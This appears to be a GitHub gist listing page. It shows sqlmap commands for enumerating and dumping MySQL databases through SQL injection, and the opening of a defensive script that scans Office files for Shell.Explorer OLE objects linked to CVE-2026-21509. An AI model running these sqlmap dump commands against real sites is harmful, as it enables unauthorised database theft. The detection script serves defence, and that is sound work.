# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Damjan Vratovic onlypwns
onlypwns
/ sqlmap-cheat-sheet.md
Created
March 12, 2026 19:25
— forked from ingramali/sqlmap-cheat-sheet.md
SQLMap Cheat Sheet
onlypwns
/ olecheck_CVE2026-21509.py
Created
February 21, 2026 09:31
— forked from decalage2/olecheck.py
olecheck - a simple script to identify potential CVE-2026-21509 samples
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # script to scan MS Office files, looking for "Shell.Explorer" OLE objects which could match CVE-2026-21509 | |
| # using oletools - https://github.com/decalage2/oletools | |
| # Philippe Lagadec 2026-01-28 | |
| # NOTES: | |
| # According to the MS advisory https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509 | |
| # the CVE-2026-21509 vulnerability is related to CLSID "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B", | |
| # corresponding to the "Shell.Explorer" COM object, which can be used to open the legacy | |
| # Internet Explorer engine (aka Trident/MSHTML) from any application. | |
| # So to exploit CVE2026-21509 from a MS Office document, one could use either an OLE object |